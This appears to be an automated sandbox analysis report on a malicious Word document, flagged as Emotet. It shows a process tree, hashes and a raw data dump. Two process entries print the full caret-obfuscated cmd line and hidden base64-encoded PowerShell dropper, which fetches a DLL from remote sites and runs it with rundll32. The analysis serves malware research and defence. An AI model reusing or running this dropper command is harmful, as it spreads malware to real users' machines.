                                          Data Raw: 61 33 34 0d 0a db 7a 32 2c 0e a8 38 d9 2d 84 5e b9 b0 23 46 ca 80 52 0c d9 a0 88 b2 e8 cc 5a 45 13 ab 84 5f 15 22 67 da 93 c4 d5 f2 7c 11 33 91 e4 7c 20 61 73 69 34 91 bb b4 54 75 26 d7 30 b3 a8 71 ca ea 6e 04 44 8b f1 2f b8 98 ee cd f7 a0 40 32 74 7c da 68 74 73 24 4b 63 f6 15 a9 21 bd 5b 3e 2b 93 a1 a6 f1 f8 ca c6 77 6e 3e 1b c0 31 26 3f 88 d0 be 56 f2 24 c4 43 e8 10 01 5f 40 65 1d 3c a9 cb 1d f6 e1 96 26 79 c6 8b 98 d8 99 a5 74 c4 44 d1 c3 c7 3a c7 ad 94 b5 e0 60 aa 8e ba c2 2e 48 a9 8c a9 bb b9 04 a0 3f 1f 5d 40 b1 41 c6 e8 d1 e2 e6 eb dc e5 90 59 a7 08 26 99 3c c3 dd 6b 52 d9 46 06 ef 92 2f 8b b1 db e1 65 6a 3d fa b9 1f 93 8a b2 fe 81 ed 07 5d f8 d0 31 c7 4c 59 27 ec 51 8e ac fa 86 21 cb 6c 47 43 70 8a 0a ae cd a4 fa b1 69 da 88 d5 79 1f 20 60 23 ad 31 ea b0 14 35 b1 ac 80 9b 21 ed dc d9 3b 6b 17 23 0b 6f d3 ae cf b4 8f d5 ad 98 be 50 30 1d 28 cb de d3 a1 b4 e4 b2 9f db ad c0 40 4c 34 4f 41 f2 fd f7 59 40 64 ca bb 91 9c c7 ce 82 9e 1a 67 48 a7 df 17 84 b6 24 84 c6 a3 73 a2 44 83 54 2e d8 48 b3 fc 9c bb 09 26 47 3f da 1a 96 1b 0a a6 93 ce 1c 32 5a 25 57 fe 98 17 23 37 32 b5 e7 76 a9 9c 3e 8d 86 2f 1e ec e3 6b 2f 23 1c 47 b6 8d 05 9c 9c d6 d1 95 c3 10 d5 45 76 5e 56 ef 30 45 d4 da 9f 36 9f e3 54 91 5a 50 0b f5 06 55 bb ce 3a 4b 20 f1 6e 65 fa 79 46 c8 7c 89 f8 39 aa 4f 14 69 39 a7 a1 96 68 95 d8 e2 ba ed 72 b7 b9 d0 02 d7 41 c6 b1 1c ae 95 77 42 83 de bc 88 b8 8f ea 6e 3a e2 85 f1 cf 34 e6 5d ae b1 81 8a 2c 9e 74 38 56 b8 18 8f ac dc 50 a0 47 ce 4f 73 04 bb 23 92 94 c4 d0 22 b5 fd bb 66 ff 46 fd 90 c1 c0 80 37 c7 ee 66 cc c8 40 b5 e6 d3 04 59 fd 3f 10 64 b3 3b 4b 7f ac d2 2c f5 b0 34 82 b3 a7 82 f8 00 e7 91 82 17 9d 24 97 ec da 42 74 bb b6 fd 70 03 e9 a6 16 c0 dd ac 37 ea 6e 9c 38 4d 5b 98 c8 06 ab bd 6e aa a0 dc 8b 6b cd 09 b0 21 d7 b2 6d b7 86 90 66 81 b5 a9 c8 d7 bb d4 53 1b 5c ce 2c 09 79 82 d0 a5 29 97 f7 38 2b 6b 5a 29 69 bc cc 48 36 fc f5 2c 9c aa c9 61 a2 af 43 c0 0c 43 c6 fa c1 51 c1 4e 04 ed 3e 74 a2 47 82 7f 86 dc 75 3b ff 7b c4 50 72 3c 74 db fa 4e 89 92 ff bc 61 f8 3a 48 aa ef 8b 1e 3c 0f 3d 06 e0 3f b6 b4 25 07 00 92 99 a1 7f 2e 92 56 13 aa 40 1a ec 11 0b 62 6e 23 6f 3f 9b d1 8b 72 62 b3 30 d1 d8 5b 6c c2 ce b5 a2 e4 b1 38 9c d5 7e 4b b3 6a ce 75 f6 e0 34 05 43 7e 7f 96 cf d9 a2 b6 38 69 99 7a 87 8b b6 cb 72 a5 3c 01 39 45 93 e4 9f 65 bb e4 c3 a4 a9 b9 6e a2 82 3c 7b 78 ea 9e e2 7b 58 57 f6 87 8d a9 f1 f1 b3 25 a4 1c 08 31 dd 68 d9 36 18 c6 bc f8 50 9f e2 3d c5 5a 1e 4c 5c da 2d 85 c2 15 3b 48 98 7b fe d5 68 88 b6 d0 dc 1f da ef a5 03 2a 70 6d a1 fc 2e b6 e8 4f 72 dc 4f 27 88 17 69 35 10 9e a0 45 bb f9 9e b6 76 2c 95 03 45 0b 6c 5b d9 9c c3 9e 30 c8 e0 a1 6a 37 9f 12 da 22 87 dd bd 64 3b 42 10 79 33 6e 67 8b d2 49 2e 47 d1 e7 9c 9f 58 c2 c5 54 1d 87 af a2 48 66 37 17 28 13 d9 55 88 d9 ba 94 e5 c6 64 55 51 a7 79 b7 82 4a e4 c0 28 93 fa 0d fd b0 87 16 82 d3 60 22 78 b1 a9 69 c7 e5 50 03 7a eb 1b 59 1a bc 47 e4 ca 78 e5 4b f9 26 8b b7 03 1c 50 b2 60 7c 2b d6 b7 f6 10 34 6d 66 7b 04 d0 21 97 bb 8a d6 77 d4 50 3d 59 68 23 4b cb fb fa 13 db df cf fd f7 b6 95 1c ec 77 8c f1 85 8b 4b b8 97 c1 21 4a e4 36 1c e0 b6 0a 59 77 e3 06 8b c2 9b 96 83 b4 ce 36 35 84 8e 28 e0 b7 b9 2b d6 c1 73 42 95 ed 56 40 de 76 e8 12 62 d5 95 34 85 2f d2 70 70 a1 5b f0 45 67 ad 3e bf a2 2b 9b b0 2f 75 7a 4c 64 5e 7a 15 90 0c 31 79 74 7d 30 a3 b8 a8 39 c1 88 4c 25 06 78 73 81 98 93 be e4 54 11 13 1f e6 82 a7 3b 18 a6 b7 4c 36 3a 87 24 25 4d 11 0f 31 03 eb aa 57 3e cf 56 06 91 dc d2 7e 5f 9f cc ea af 65 4e b2
                                          Data Ascii: a34z2,8-^#FRZE_"g|3| asi4Tu&0qnD/@2t|hts$Kc![>+wn>1&?V$C_@e<&ytD:`.H?]@AY&<kRF/ej=]1LY'Q!lGCpiy `#15!;k#oP0(@L4OAY@dgH$sDT.H&G?2Z%W#72v>/k/#GEv^V0E6TZPU:K neyF|9Oi9hrAwBn:4],t8VPGOs#"fF7f@Y?d;K,4$Btp7n8M[nk!mfS\,y)8+kZ)iH6,aCCQN>tGu;{Pr<tNa:H<=?%.V@bn#o?rb0[l8~Kju4C~8izr<9Een<{x{XW%1h6P=ZL\-;H{h*pm.OrO'i5Ev,El[0j7"d;By3ngI.GXTHf7(UdUQyJ(`"xiPzYGxK&P`|+4mf{!wP=Yh#KwK!J6Yw65(+sBV@vb4/pp[Eg>+/uzLd^z1yt}09L%xsT;L6:$%M1W>V~_eN


                                          Code Manipulations

                                          Statistics

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          Analysis Process: WINWORD.EXE PID: 2448 Parent PID: 584

                                          General

                                          Start time:13:32:40
                                          Start date:26/01/2021
                                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                          Imagebase:0x13f790000
                                          File size:1424032 bytes
                                          MD5 hash:95C38D04597050285A18F66039EDB456
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Analysis Process: cmd.exe PID: 1100 Parent PID: 1220

                                          General

                                          Start time:13:32:42
                                          Start date:26/01/2021
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACgAJwAgAG4AJwArACcAZAA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwBlAG8AJwApACsAKAAnAHAAYQByACcAKwAnAGQAYwAnACkAKwAoACcAcgBhAG4AJwArACcAZQBzACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AJwArACcAegB5AG4AcQAnACkAKwAnAC0AJwArACcAbAAnACsAKAAnAGkAJwArACcAbgB1ACcAKwAnAHgAJwArACcALQB5AGEAYQB5ACcAKQArACcAZgAvACcAKwAoACcAdwAnACsAJwAvACEAbgAnACkAKwAnAHMAIAAnACsAKAAnAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgACcAKQArACcAbgAnACsAJwBkACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AbQBtAHIAaQBuAGMAJwArACcAcwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACsAJwAvAGUAdABlAHIAbgBhAGwALQAnACkAKwAoACcAZAAnACsAJwB1AGUAbAAnACkAKwAoACcAaQAnACsAJwBzAHQALQAnACkAKwAoACcAOQBjAHUAJwArACcAcQB2AC8AagAnACkAKwAoACcAeAAnACsAJwBHAFEAagAvACEAJwArACcAbgAnACkAKwAoACcAcwAnACsAJwAgAHcAJwApACsAKAAnAHUAIABkACcAKwAnAGIAIABuAGQAJwArACcAOgAvACcAKQArACgAJwAvADMAJwArACcAbQB1ACcAKwAnAHMAawAnACkAKwAnAGUAdAAnACsAKAAnAGUAZQByACcAKwAnAHMAZQBuAHQALgBuAGUAJwArACcAdAAvACcAKQArACgAJwB3ACcAKwAnAHAALQBpAG4AJwArACcAYwBsAHUAZABlAHMALwBUAFUAJwArACcAZwBEAC8AIQBuACcAKwAnAHMAIAAnACkAKwAnAHcAdQAnACsAJwAgACcAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AZAAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAcwAnACsAJwBrAGkAbABtAHUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB3ACcAKwAnAHAALQBhACcAKQArACcAZAAnACsAKAAnAG0AaQBuAC8AJwArACcAaAAnACsAJwBRACcAKQArACgAJwBWAGwAQgAnACsAJwA4AGIALwAnACkAKQAuACIAcgBgAGUAUABsAEEAYABjAEUAIgAoACgAKAAnAG4AcwAnACsAJwAgACcAKQArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAnAG4AZAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEsAMQBpAHUAeAB4AHAALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBwAGAAbABpAFQAIgAoACQARAA1ADQAUwAgACsAIAAkAEsAbwAzAGEAYwA2ADMAIAArACAAJABGADAAOABKACkAOwAkAE8AMQA2AFIAPQAoACcAWAA2ACcAKwAnADIAVgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEoAZAA1AHMAXwBoAGYAIABpAG4AIAAkAFQAYQAxAHkAcwBwADQAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAHMAeQBTAFQARQBNAC4ATgBlAFQALgB3AEUAQgBDAEwASQBFAG4AdAApAC4AIgBEAE8AdwBOAGAATABgAG8AQQBgAEQARgBJAGwARQAiACgAJABKAGQANQBzAF8AaABmACwAIAAkAFEAZgB4ADEAMAB4AGEAKQA7ACQATAAyADkARAA9ACgAJwBPADYAJwArACcANABIACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABRAGYAeAAxADAAeABhACkALgAiAEwAYABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAA0ADQANwAxADIAKQAgAHsAJgAoACcAcgB1AG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQAUQBmAHgAMQAwAHgAYQAsACgAJwBBACcAKwAoACcAbgB5AFMAdAAnACsAJwByACcAKQArACgAJwBpACcAKwAnAG4AZwAnACkAKQAuACIAVABvAHMAYABUAFIAaQBgAE4AZwAiACgAKQA7ACQAQgAyADcAQgA9ACgAKAAnAFcANAAnACsAJwAzACcAKQArACcAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFoAOAAxAFYAPQAoACcASQA2ACcAKwAnADIAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIANQA4AEkAPQAoACcATwAzACcAKwAnADUASQAnACkA
                                          Imagebase:0x4aa60000
                                          File size:345088 bytes
                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate

                                          Analysis Process: msg.exe PID: 1664 Parent PID: 1100

                                          General

                                          Start time:13:32:42
                                          Start date:26/01/2021
                                          Path:C:\Windows\System32\msg.exe
                                          Wow64 process (32bit):false
                                          Commandline:msg user /v Word experienced an error trying to open the file.
                                          Imagebase:0xff9f0000
                                          File size:26112 bytes
                                          MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate

                                          Analysis Process: powershell.exe PID: 2564 Parent PID: 1100

                                          General

                                          Start time:13:32:43
                                          Start date:26/01/2021
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACgAJwAgAG4AJwArACcAZAA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwBlAG8AJwApACsAKAAnAHAAYQByACcAKwAnAGQAYwAnACkAKwAoACcAcgBhAG4AJwArACcAZQBzACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AJwArACcAegB5AG4AcQAnACkAKwAnAC0AJwArACcAbAAnACsAKAAnAGkAJwArACcAbgB1ACcAKwAnAHgAJwArACcALQB5AGEAYQB5ACcAKQArACcAZgAvACcAKwAoACcAdwAnACsAJwAvACEAbgAnACkAKwAnAHMAIAAnACsAKAAnAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgACcAKQArACcAbgAnACsAJwBkACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AbQBtAHIAaQBuAGMAJwArACcAcwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACsAJwAvAGUAdABlAHIAbgBhAGwALQAnACkAKwAoACcAZAAnACsAJwB1AGUAbAAnACkAKwAoACcAaQAnACsAJwBzAHQALQAnACkAKwAoACcAOQBjAHUAJwArACcAcQB2AC8AagAnACkAKwAoACcAeAAnACsAJwBHAFEAagAvACEAJwArACcAbgAnACkAKwAoACcAcwAnACsAJwAgAHcAJwApACsAKAAnAHUAIABkACcAKwAnAGIAIABuAGQAJwArACcAOgAvACcAKQArACgAJwAvADMAJwArACcAbQB1ACcAKwAnAHMAawAnACkAKwAnAGUAdAAnACsAKAAnAGUAZQByACcAKwAnAHMAZQBuAHQALgBuAGUAJwArACcAdAAvACcAKQArACgAJwB3ACcAKwAnAHAALQBpAG4AJwArACcAYwBsAHUAZABlAHMALwBUAFUAJwArACcAZwBEAC8AIQBuACcAKwAnAHMAIAAnACkAKwAnAHcAdQAnACsAJwAgACcAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AZAAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAcwAnACsAJwBrAGkAbABtAHUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB3ACcAKwAnAHAALQBhACcAKQArACcAZAAnACsAKAAnAG0AaQBuAC8AJwArACcAaAAnACsAJwBRACcAKQArACgAJwBWAGwAQgAnACsAJwA4AGIALwAnACkAKQAuACIAcgBgAGUAUABsAEEAYABjAEUAIgAoACgAKAAnAG4AcwAnACsAJwAgACcAKQArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAnAG4AZAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEsAMQBpAHUAeAB4AHAALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBwAGAAbABpAFQAIgAoACQARAA1ADQAUwAgACsAIAAkAEsAbwAzAGEAYwA2ADMAIAArACAAJABGADAAOABKACkAOwAkAE8AMQA2AFIAPQAoACcAWAA2ACcAKwAnADIAVgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEoAZAA1AHMAXwBoAGYAIABpAG4AIAAkAFQAYQAxAHkAcwBwADQAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAHMAeQBTAFQARQBNAC4ATgBlAFQALgB3AEUAQgBDAEwASQBFAG4AdAApAC4AIgBEAE8AdwBOAGAATABgAG8AQQBgAEQARgBJAGwARQAiACgAJABKAGQANQBzAF8AaABmACwAIAAkAFEAZgB4ADEAMAB4AGEAKQA7ACQATAAyADkARAA9ACgAJwBPADYAJwArACcANABIACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABRAGYAeAAxADAAeABhACkALgAiAEwAYABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAA0ADQANwAxADIAKQAgAHsAJgAoACcAcgB1AG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQAUQBmAHgAMQAwAHgAYQAsACgAJwBBACcAKwAoACcAbgB5AFMAdAAnACsAJwByACcAKQArACgAJwBpACcAKwAnAG4AZwAnACkAKQAuACIAVABvAHMAYABUAFIAaQBgAE4AZwAiACgAKQA7ACQAQgAyADcAQgA9ACgAKAAnAFcANAAnACsAJwAzACcAKQArACcAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFoAOAAxAFYAPQAoACcASQA2ACcAKwAnADIAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIANQA4AEkAPQAoACcATwAzACcAKwAnADUASQAnACkA
                                          Imagebase:0x13f940000
                                          File size:473600 bytes
                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Reputation:high

                                          Analysis Process: rundll32.exe PID: 2736 Parent PID: 2564

                                          General

                                          Start time:13:32:48
                                          Start date:26/01/2021
                                          Path:C:\Windows\System32\rundll32.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                                          Imagebase:0xff5f0000
                                          File size:45568 bytes
                                          MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate

                                          Analysis Process: rundll32.exe PID: 2764 Parent PID: 2736

                                          General

                                          Start time:13:32:48
                                          Start date:26/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                                          Imagebase:0xb30000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2107162967.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
